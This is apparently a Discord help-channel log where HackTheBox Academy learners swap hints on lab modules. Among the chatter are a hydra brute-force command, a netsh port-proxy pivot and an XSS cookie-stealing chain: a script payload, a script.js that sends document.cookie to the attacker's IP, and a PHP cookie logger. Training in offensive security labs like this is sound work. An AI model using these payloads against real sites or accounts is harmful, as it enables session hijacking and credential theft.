10.10.16.0 is your IP so you're trying to ping yourself
Wait I'm dumb
And you've completely changed VPN regions too?
TCP/UDP etc
Yes but only whichever the US based ones. It's totally random it seems. It just started working again half way through the lab.
Hello! I'm having trouble with the final privesc needed on the skills assessment of the Linux privesc module. Can someone help? Can't reveal much here so as not to spill any spoilers
Questions about responder box goes in #boxes , in order to access that you need to do ++verify in #bot-commands
This channel is about the modules found at https://academy.hackthebox.com
What is the Website called?
Is it login.php ?
The Admin Panel page is called login.php
And not admin_login.php?
sudo hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 206.189.112.129 -s 31180 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
I have used that
And it worked
^USER^:password is wrong, it should be php:username=^USER^&password=^PASS^
The 3 Parameters are divided by :
Not the Elements of the Parameters
Is anyone using Digital ocean for a VPS setup? Can they tell me how they uploaded the img of parrot security to DO?
Was anyone able to complete the live engagement of the Shells & Payloads module?
I need some help with it
Whats the Problem?
do you think you really need a VPS, whats stopping you from running a local vm?
I am using a VM but figured the lessons were linked somehow 😅
you can continue to do stuff from your VM, there is no need to spend money on a VPS if it is not necessary
The problem is that I understood from the assignment that I need to rdp to the foothold machine, and I figured all the IPs of the hosts that I have to exploit, the problem is for instance how can I go to the browser from the foothold machine?
Thank you for the feedback ❤️
because from the reading, I figured that I can not attempt to exploit any hosts from my machine, it has to be from the foothold machine
Just open firefox in terminal
ohh, never thought about it. I thought there was no firefox installed on the machine. Thank you bro !
Is this general
Hello all, having some trouble with the Attacking SQL Databases Section of the ‘Attacking Common Services’ module.
I found the hash of the user, and tried using both mssqlclient.py and sqsh with domain syntax for both but it doesn’t take…could really use a sanity check 😅
Update: solved it by using my own vm….sqsh doesn’t work in Pwnbox
@sly dirge I used DO for practice once. I used the Debian image they had on it and basically downloaded Parrot on top of it so i never uploaded anything to DO.
Thank you for replying! I will stick to my Parrot VM on top of my Ubuntu install so I do not have to pay for more hardware. Would rather put that money toward more cubes for hacking fun time!
Anyone on that has finished Web Attacks module and can give me a nudge? Feeling really stupid right about now in the skill assessment.
hey guys, do you know who to tell if I found little text mistakes in modules etc.? ty 🙂
You can dm me if you're still working on it
Any way to bypass exit(0) in php ?
<?php
error_reporting(0);
if (isset($_POST['submit'])) {
    $file_name = urldecode($_FILES['file']['name']);
    $tmp_path = $_FILES['file']['tmp_name'];
    if (strpos($file_name, ".jpg") == false) {
        echo "Invalid file name";
        exit(1);
    }
    $content = file_get_contents($tmp_path);
    $all_content = '<?php exit(0);' . $content . '?>';
    $handle = fopen($file_name, "w");
    fwrite($handle, $all_content);
    fclose($handle);
    echo "Done.";
} else {
    show_source(__FILE__);
}
?>
please delete this… you’re spoiling the lab. no lab/challenge is supposed to be easy the point is to struggle and learn from it.
yes that is how you get it however that spoils the entire point of learning it; there is a reason that whenever people ask we give somewhat vague hints such as subdomains of subdomains, and emphasizing words. It's not that we don't care to give them the answer, but people don't learn when they are just handed the answer
this is a field of trial by fire a lot of the times
do things break? yes. do we get frustrated that the skill test isn't exactly like the module example, yes. however the point of the examples is to show the format of how we should be thinking, even if some options may end up being redundant in cases
I think that HTB Academy is going to add an advanced web attack path and doesn’t want to say it. My evidence is all the new tier III and IV stuff most of it seems to be web related and it seems to be stuff that could fit into a path that picks up where big bounty path left off. This is just a conjecture I don’t know for sure. But if I had to guess that’s the guess I would make.
People say it’s unnecessary but I think it’s going to be done or why would they keep adding all this new web stuff? Those of you who do NOT have insider info like me, what do you think?
Im at the module - PIVOTING, TUNNELING, AND PORT FORWARDING, section - Remote/Reverse Port Forwarding with SSH, i followed the steps in the module closely but i cant seem to get a stable reverse shell, it shows many sessions being closed, any help on this?
I'm sorry! This may be a silly question. Which method is more effective or simpler, web penetration or SQL injection into a website?
@cinder mortar check the payload
hello guys! quick question. do i have to be on the same network to hack a webserver or a computer using Metasploit-framework?
@rustic sage It depends because if it is on the different network you need to pivot to that network
You are welcome
@placid quest can i do that in Metasploit as well?
@rustic sage yes
ok thanks
if u still stuck u can dm me
Anyone in here that did the LDAP Enum module? I'm stuck at something, could need a chicken nugget.
I feel like a total noob but i'm stuck on a question in the Intro to Network Traffic Analysis.
The question is || What addressing mechanism is used at the Link Layer of the TCP/IP model? ||
Dm me
Hi all! I'm working on Skills Assessment - Service Login module, already got SSH access with harry.potter. When I use hydra I get the following:
[ERROR] Can not create restore file (./hydra.restore) - Permission denied (I don't have access to root at the moment)
You may need to set the handler, check the module again
Hey guys im working on the skills assessment for file inclusion needing a slight hand if possible
can dm me
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload) anyone that can help me with this i have no clue how to do it
how do i encode the request while fuzzing
can I dm anyone on Linux Local Privilege Escalation - Skills Assessment on flag4.txt? thanks in advance
hey guys! im facing some issues with wifi on kali linux live boot. i use a dual band AC 7265. can anyone help?
Hello, I would like to understand the real answer of the last exercise of Linux fundamentals > Filter Contents; I think it might be wrong..? if anybody could explain it to me, please send me a dm or i could also dm somebody, thx!
Is anyone available for Command Injections SA? I think I'm right there and bypassed most of it, but still no results...
@carmine kiln i have found an issue with the file inclusion box with a php command: it should be 'cmd' not "cmd" - caused me issues, wasnt sure why log poisoning wasnt working till i had a good look - not sure who to tell to fix but I know it would affect others
I'll forward it to the academy team
if you post this in #858470491676737536
thanks, I was trying to finalise the assessment and like pulling my hair out about why the script wasnt working, im fairly new to php so didnt realise 😄
ok will do ty
Thanks but im receiving help at the moment
hello, I can't pass the Firewall and IDS/IPS Evasion - Hard Lab section in the Penetration Tester section. I'm stuck on the last question can you help?
you can dm me
you can dm me
please delete this as it contains massive spoilers
you can dm me if you wish for a hint.
hey, im not done with my current module, and would like to start it again. Can i reset it?
Hi @idle cargo! What is your current directory?
You need to change directory into username-anarchy
go to the end of the module and click Finish. once you're brought to the completion page, you'll see a Retake Module button on the right side.
hi thank you for responding, but currently im not done with the module (havent done the skill assessment) and i forgot everything so im unable to solve it. Thats why i would like to repeat the whole module 🙂 isnt there any way ?
I don't believe so. you can just go back and reread and don't refer to your notes. you just won't get the satisfaction of clicking submit.
you can also go back to any section though and start up the lab.
okay seems like there is no way around. thats something that could be fixed lol. whatsoever, thx!
it doesn't need to be fixed? you can still start the lab and redo everything you just can't resubmit the question that's already submitted. think of it this way... you have a way of checking your answer when you finish
Hi all! I'm working on Skills Assessment - Service Login module, already got SSH access. Can someone help me with brute forcing the next user?
you might want to delete the names it's a spoiler. well the first part is
Yes, sure! 😉
there is a provided wordlist use it 🙂
hello,
are we allowed to copy windows tools from the target system to our kali machine ?
I don't see why you would want to.. just compile a new version (if it exists) yourself. all the tools are public
I found the wordlist already, but I don't know target/ IP to specify (ftp / ssh)
try both see what works and what doesn't
I encountered errors in some public tools that I downloaded. I just wanna test whether the tools that are working in the htb labs will also work in my own local practice lab.
The question is are we allowed ? 🙂
you're probably compiling or downloading them incorrectly. most (if not all) have installation instructions you can follow. to answer your question, I don't know if a rule exists for that or if it's prohibited. I just downloaded and compiled everything myself, which I believe most people do🤷♂️
Do I need to use the sed commands to limit the wordlist?
Thanks thanks
why would you do that? just use the wordlist that is provided
Just a wild guess...
do what you learned in the sections 😉
I've tried everything, I'm out of options 😛
you can dm me with: where you are, what you've tried, what you're thinking, potential next steps
patience is important 🙂
Yes, be patient with the second question...
Take a coffee or beer 😛
this might be the wrong field for you then🤷♂️
you're going to fail a lot.. this field requires a lot of patience and perseverance
the upside is once you find the solution after a long time you'll definitely remember how you did it
speaking of patience. anyone wanna help me on this last flag on pivoting assessment? been on it for 3 days lol. like im so close or at least thats how i feel
Can someone help me with a question?
What security policies can block certain users from running all executables?
did you rdp into the dc?
I must have put in Application Control Policy like 20 times.
if you're in AD Enum & Attacks there is a section that specifically talks about that. What section is that again?
nope thats the part im having issues with. obviously the hash isnt going to be cracked so i cant just sign in. but i feel like i can pth but i m having issues getting a payload on the windows 2 to call back to me
Security in active directory.
to set the autoroute and add it to my socks proxy
ahh I see your issue
think u might be overthinking it
I know its APC. Im looking right at the damn thing and it says exactly what the question is asking for.
not gonna lie. probably
||Copy it exactly how it's presented in the module||
What do you mean?
will say that RDPing into the DC should be simple
@analog tendon what problem are you facing with pivoting
||In the section, the section isn't called Application Control Policy.||
…OH YOU PICKY SON OF A BITCH!!!
should be. i can tell you all that ive tried. which is a lot
remove the spoiler please, but yes😂
Hey all, I've been having some issues completing the Shells and Payloads module and figured I should reach out here. I completed all of the boxes in the live engagement besides the second one, and keep getting this error when I try to use the metasploit module:
getting into the DC. i have portfwd set with my metasploit and have a payload on the windows2 machine but payload doesnt reach me. ive used netsh to portproxy to attempt to rdp that way but it wouldnt reach
guys i need urgent help please if anyone can
I'm trying to finish a module up right now, but if you want to dm me I can try to assist on the side. if no one else is available
@analog tendon did you dump the lsass
iirc this is the pivot map..
||start -> 1st pivot (w/ tunneling) -> 2nd (credentialed) -> 3rd -> DC||
big spoiler: ||you only need to tunnel once||
if i cant figure it out here soon then yes i might
i did
@analog tendon did you use netsh to connect to another machine
i figured. but i cant crack V's hash and had to use pth to rdp into windows 2. figured its the same for DC
i set the netsh port proxy so when i attempt to use xfreerdp itll forward to the DC but it wouldnt connect
How @analog tendon
i set the port proxy as v4tov4 listeningport=4444 listeningaddress=<windows2iphere> connectingport=3389 connectingaddress=<DCiphere>
its ok
but i will say attempting to rdp it gives me the whole machine is unable to connect error saying the machine is turned off or not available on the network
when doing it through the windows 2 machine
can some1 help me with WEB SERVICE & API ATTACKS SKILL ASSESSMENT
So I'm doing the Web shell module with laudanum and the question asks for the full path to the laudanum aspx shell on pwnbox and I enter /usr/share/laudanum/aspx and variations of it and it won't accept the answer, tried capitals as well as including shell.aspx but it won't have it?
alright fellas huge shout out to @placid quest @river skiff and @dim wolf for all the assistance on this. Turns out that I am a dumbass that doesnt fully read through lsass dumps to make my life easier. they are the GOAT's
Has someone done the XSS Module
Module:CROSS-SITE SCRIPTING(XSS), Session Hacking
It does call the Script.js but it doesnt call index.php
Target: 10.129.210.184
Attacker: 10.10.15.187
Listener:
sudo php -S 0.0.0.0:8080
Payload:
"><script src=http://10.10.15.187:8080/script.js/></script>
Script.js:
new Image().src='http://10.10.15.187/index.php?c='+document.cookie;
index.php:
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['10.129.210.184']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
its calling the index.php. but you werent supposed to put an ip address within the [ ]
But where do i need to put the Ip of the target?
you dont. the .js script is supposed to run and be called by the victim which then run its php script to see the cookies and show them on the php server you started
youre meant to just copy and paste it as the php script
And the script.js then calls the Victim IP?
the victim calls the script.js so no need to get their IP youll get it when the script is done running
Disregard my post turns out it wanted one of the many places you can find the damn thing
Thanks
nvm i got it
Are you sure you have two http listeners, e.g. one on port 8080 for script.js and one on port 80 for index.php?
Greetings, I’m working on the skills assessment for Intro to Windows Command Line Module and I cannot SSH the first two users, user0 and user1. I am aware that the flag for the previous user is the password for the next and the flag is provided on the banner when SSH’ing into user0’s. However, this password does not work for user1. I’ve tried both SSH and RDP. On the RDP session I receive an error saying password expired. Additionally, using the given password for user0 also does not work. Both passwords contain an exclamation mark (!). I’ve tried escaping it with a backslash in front or using single quotations on the whole password, still to no avail. Any thoughts?
Can anyone give me a nudge on File Upload module Skill Assessment section? Got really stuck for days
you can dm me with: where you are, what you've tried, potential next steps.
sure, thanks
@balmy spear I am still stuck on that
I was finally able to login to user0 on the very 1st try after switching the vpn to tcp. But after opening a second ssh terminal the password doesn't work. Additionally, when trying to execute a powershell terminal as user1 I get an error saying Account restrictions are preventing this user from signing in so I'm not sure what the issue is.
@balmy spear me too because i checked with cme, but there was no password that was working
If anyone is around to go over this sometime soon, I'd really appreciate it
Hello, I’m doing the Intro to Assembly Language module and I’m stuck on a question about the data movement. It asks to add a line at the end of a nasm file to have the value of “rsp” on “rax”; I tried with both “mov” and “lea” but all the answers I give seem to be wrong, can somebody help me out a bit?
the pass for user1 should be the flag on the banner for the ssh correct? at least that's how I understood the instructions.
@balmy spear Yes but still the flag is not working as the password
agreed
. @balmy spear maybe @fading pythonNo has done the module
@balmy spear i'll help please provide url
i've done every module so if anyone needs help let me know
Badly need a nudge on Shells & Payloads - Live engagement first box : <
when i use -Pn it works as the host shows up, but the port doesn't appear at all. All the connections are perfect (internet, vpn, etc) sometimes it works fine sometimes it doesn't.
well if you are 100% sure of that then all you can do is reset machine and vpn
i kept doing that for the past 2 hours lol. at the top right it says all 3 connections are green. (Machine, Starting point, Socket). do you think it could be something else?
Got a nudge to give?
give me a few minutes @fierce island i got plenty of nudges to give but im helping someone else real quick
Can I also get a little nudge?
Bruh, you can't use starting-point VPN for module content... If this is about the #starting-point box go do ++verify in #bot-commands
whats that (++verify) ? please and thank you
appreciate it Mr Hacker
Do u mind if i dm you with WINDOWS PRIVILEGE ESCALATION ?
Need a nudge on the same module, second box though
Well would you care to nudge me on the first box while you wait for one?
DM to keep it spoiler-free?
Sounds good
I've got an issue with using crackmapexec in the Attacking Common Services / Attacking SMB section. When I run the command against the user jason, I get a response that all of the passwords are correct. Has anyone seen that before?
all of the passwords are correct?
Yes, it shows every one of them are correct. Obviously they're not.
then wouldnt everyone have seen that before?
Right, that's why I'm asking. It's very odd.
I've even restarted the instance and my VM.
It does happen
obfuscating things to make you think isnt odd
It's basically bruteforce protection
congrats marcie you found the key to my heart
congrats jp3g you found the key to my heart
Ew, take it back
hey all, im stuck on "Intro to Active Directory" question: What uniquely identifies a Service instance? (full name, space-separated, not abbreviated). I thought the answer was ||Service Principle Name ||but that's not working, and i tried it upper, lower case as well. The hint was ||It is used by Kerberos to associate an instance of a service with a logon account.||
what the- what is this?
obfuscation
how do you know me?
i dont know you
😕
i saw you typing. look down V
keep the channel on topic @rustic sage
we are on topic
Anyways I'm fairly confident my answer is correct for this question, but is there a way to check what answer it is expecting? Like a solutions page or something?
Isn't there a hint button?
Hey, can someone explain to me how / where to find the number of zones that exist on a nameserver. In particular I am doing the Information Gathering / Active Subdomain Enumeration module and I got lucky at the second question. But I still don't understand how exactly I should have gotten the right answer. I used dig and nslookup (||axfr||) but I don't know where I can find the number of zones then.
put "the" in front of it?
A Service Principal Name (SPN) uniquely identifies a service instance. They are used by Kerberos authentication to associate an instance of a service with a logon account, allowing a client application to request the service to authenticate an account without needing to know the account name.
||You're right but do you have trailing or leading whitespaces?||
Where can I link my academy profile to here? I'm not making a normal HTB account
RIP, this didn't work but it was a good idea
This obviously isn't the channel to ask this but I have no other option
only silver annual subscribers can link their accounts for now
Marginally lame. I'll stay away until I can answer modules more successfully
no trailing or leading whitespace
dm me
done
One last thing before I go: there is no like #server-feedback. There is no "normie general". I am an academy user and I'd like to discuss HTB academy but this is quite literally the only channel available to me to talk in. :???: Have a good day, sorry for being a boob
You can create an account on the main platform and verify it, usually it takes like not more than 5 minutes
Okay, even using the --no-brute-force option in crackmapexec, I still get the same response that all passwords are correct. Any ideas on this one?
anyone free for web attacks skill assessment? ||I'm at the very last step just have trouble getting the flag||
You can DM me where you're stuck and what you have tried
@sterile hawk
Why aren't mods pingable?
@teal mountains
Sorry moderator
@carmine kiln maybe a panda is more online than like
Can any one help me with Intro to Bash scripting?
I figured out my issue. Metasploit is your friend!
Hello all, on the Attacking RDP section of the Attacking Common Services module…I’m a bit confused on the last question…I assumed it was supposed to be a RDP session hijack, but I couldn’t find any other users when running ‘query user’. Also, couldn’t dump the SAM file due to lack of permissions…was wondering if I could get a nudge?
Is anyone able to help me understand why the first ncrack command I ran did not work, while the second seemingly did?
Tried to omit some of the output. Basically the user is in the username.txt file but it won't discover it...
But if the user is explicitly set, it works fine.
Don't use ./
use ~/<file>
or /path/to/file
Going to try that now. Is this just an ncrack thing? I am confident I've done that before with things like hydra and crackmap successfully.
In any case, I am running that now. Thanks for the tip
Not exactly sure. ./ usually means you're trying to execute something, not reference it. I could be wrong but that's just what I found on the man page
Example: ncrack dicom://127.0.0.1 -U aet.txt --pass DOESNOTMATTER
The above is also from the man page
how did you bypass email validation for the payload?
Hello everyone, I am stuck in the lab of HTTP Attacks https://academy.hackthebox.com/module/191/section/2056 I was able to make an XSS injection but I don't receive any connections from the admin account to steal the cookie, even if I just put the URL of my machine. Is something not working in the lab? Or am I missing something? Help please
Need help with user hash using secretsdump ... I retrieved the SAM, SYSTEM, and SECURITY files from the backup drive but when I run it through secretsdump I get this error: "read length must be non-negative or -1" How do I resolve this?
what did you use to get it working?
Look into how /drive: works for the xfreerdp command
When passing files through a command, ./ refers to the current directory, ~/ refers to home. It does not mean it's trying to execute something. However some commands do break without absolute paths, I would look into how it's expecting to receive files. Generally though you would pass a single file in the current directory by just putting the filename, not needing the ./ unless you're trying to move through nearby directories
I have 40 cubes. I was trying to unlock tier 0 modules but it's not working. Please help
It seems you have completed the Windows Priv Escalation module ... I want to ask about the pillaging section where we need to get the admin hash but after retrieving the SAM, SECURITY and SYSTEM files from the backup drive, the impacket-secretsdump didn't work at all. Just wanted to know if I am on the right track or missing something
There were 4 backups and I used ftp to get them to my machine ... transferred bytes seemed correct (didn't check the md5 though) but somehow all three backups gave me an error with samdump2 and impacket-secretsdump ... well at least I know the issue is not with what I know
Hi Guys, I've been struggling for a while with the Skills Assessment - Web Fuzzing, Q3 (One of the pages you will identify should say 'You don't have access!' What is the full page URL?)
This is the command I'm using now ||ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u 'http://archive.academy.htb:31455/FUZZ , http://faculty.academy.htb:31455/FUZZ , http://test.academy.htb:31455/FUZZ' -recursion -recursion-depth 3 -e ' .php,.phps,.php7 ' -v -fs '0,1'||
I tried changing the filter to only 200 status code, no filter and tried with no luck
I have the same issue 😣 I can’t tell whether it’s me or the network or whatever. Have been trying many hours.
As you experience the same thing, maybe it is not my fault after all 😅
I have completed the first two Nibbles quests last month and got in. Had to take a break and now it just doesn’t work anymore for the last part 🙁
chisel
HI
I'm stuck on the part II of AD assessment.
I got a foothold in MS01 and SQL01.
I got credentials on SQL01.
I can't find a way to get the admin flag from MS01.
With bloodhound I found the user who has generic all rights but I don't know how to get his hash.
Mhm.. I must be doing something wrong. I found a courses directory inside the faculty subdomain and that's all of the useful stuff. By changing filters I found a bunch of forbidden pages. I also tried regex match. Tried doing one subdomain at a time too
Anyone done the BloodHound Module and is willing to give me a nudge for the last question of the skills assessment?
Are you talking about the pwnbox? Also... yeah every module is doable from your own vm via the vpn tunnel...
Ah so I am misunderstanding you. Also this may reflect the real world; sometimes when you rdp into a machine you may not get the best performance. Some may be from your own machine, others may be just due to the system itself. That's usually why it's recommended to wait a few minutes after spawning a machine to try and mess with it
Hello. I just made an annual silver subscription.
Hey all, for attacking common applications it's showing us how to use EyeWitness at the start, but the active machine (IP) is only running port 80 with nothing on it, is this just a demonstration or are we to follow along? If we are, then where are these services :S
Hello! I'm working with the meterpreter tunneling but I'm stuck with the autoroute command 😦
Any idea on why I'm getting this error 😦
Do you have an active session already
I'm going through that but in the notes this is the first step...
Ohhh yeah I have Session 1 created and running
What is before that, you must have some instruction
there you go
But then why does it give me the error if the session is created and running...
Right. So this was a previous screenshot
It's not working now anyways 😦 😦
No it's running 😦
I would recommend starting from the start
and go through it all command by command
it can't route if there is nothing to route through
You're routing through that session 1 which is your pivoting target
Make sense?
I'm processing it hahahah wait
I just finished the ping sweep
You have to set the session value to the value of your actual meterpreter session, so if it's session 10 you need to set it to 10 :) but yeah the tunneling one really walks you through everything
Currently looking at the Linux Privilege Escalation module. Regarding the LD_PRELOAD method I was wondering whether it is always possible to escalate privileges as long as there is at least one sudo program present which imports at least one dynamically shared library (.so). Is it true or do you know cases how this is prevented?
Go back where?
literally just redo that section from top to bottom
It's session 1
is what they're saying
Also once you have the session running you need to do [ctrl + z] to background it while you do the other stuff
you need your pivot host
session 1 = your pivot host, but it died so you need to get it back
Are you killing it?
Or backgrounding it
ctrl + c = kill
ctrl + z = background (eg will be alive in active sessions)
I get no active sessions 😦 😦
I killed the session 1 and it opened another one... it created another session with number 2 but still it says no sessions
Can you give me a bigger screenshot, are you able to enter commands inside meterpreter?
yeaaaah!
Now I'm with the background and I exited everything!!!
rookie mistake
Hello together, my free time is done with Pwnbox. So I'm thinking about creating a VM with VirtualBox. So which OS can I use for that?
Yeaaaah, now I'm back with the meterpreter session, I got to do it in the same console
yep
How do I exit the meterpreter shell without exiting the console?
those sessions are dedicated to that specific terminal
ctrl + z
you need to do some msfconsole module
before pivoting
this is basics
It's free when you complete it
And how do I go back to the session hahahaha
ohhhhhhhhhhh yeeeaaaahhh
lol
Got it!!!!
🙂
yea
get your foundation good
do all the foundational HTB modules
saves you pain
This module gets tougher and you don't want to waste time
on guessing
I've been studying this for 3 months, just spent most of my time learning the basics, just moving into boxes now
This whole sessions and tunneling thing is crazy...
Why are you learning pivoting?
I'm going through the CPTS path
first cert?
hey
I need help with this question
Hacking WordPress skill assessment
I have got everything else
lol you gave me PTSD ... so much I can't recall how I solved it but there is a hint elsewhere that can help
any of those plugins LFI?
yes
You're welcome :)
I don't think it's the file inclusion vuln cause I don't know the flag name
there was a separate question for file inclusion
If I can DM anyone regarding this please let me know
do you have command injection
yes
the / directory has no flag
and the question says unauthenticated file download
and command injection is authenticated, so that's kinda cheating to just go through every directory to eventually get the flag somehow
command injection is authenticated?
you are on the right track
I thought it was unauthenticated
Yes that's authenticated, you upload the shell after logging in using a username and password
So that's authenticated.. cause if you don't have any username or password you won't be able to upload the web shell
Hello, I'm trying to install aquatone, I'm using this but I have an issue
go: go.mod file not found in current directory or any parent directory.
'go get' is no longer supported outside a module.
To build and install a command, use 'go install' with a version,
like 'go install example.com/cmd@latest'
For more information, see https://golang.org/doc/go-get-install-deprecation
or run 'go help get' or 'go help install'.
I'm looking at the repository of aquatone and it is archived, does somebody know how I can solve this?
what?
you trying to run it?
I export the go path to my path
export PATH="$PATH":"$HOME/go/bin"
but it doesn't work
You need to feed it commands I believe
Doesn't the assignment say "in home directory"?
It's probably not set as a binary so you need to run it where you downloaded it
[bat error]: 'web_discovery.xml': No such file or directory (os error 2)
aquatone v1.7.0 started at 2023-03-27T13:22:59+02:00
Unable to parse input as Nmap/Masscan XML: EOF
Yea aquatone is hella buggy
what?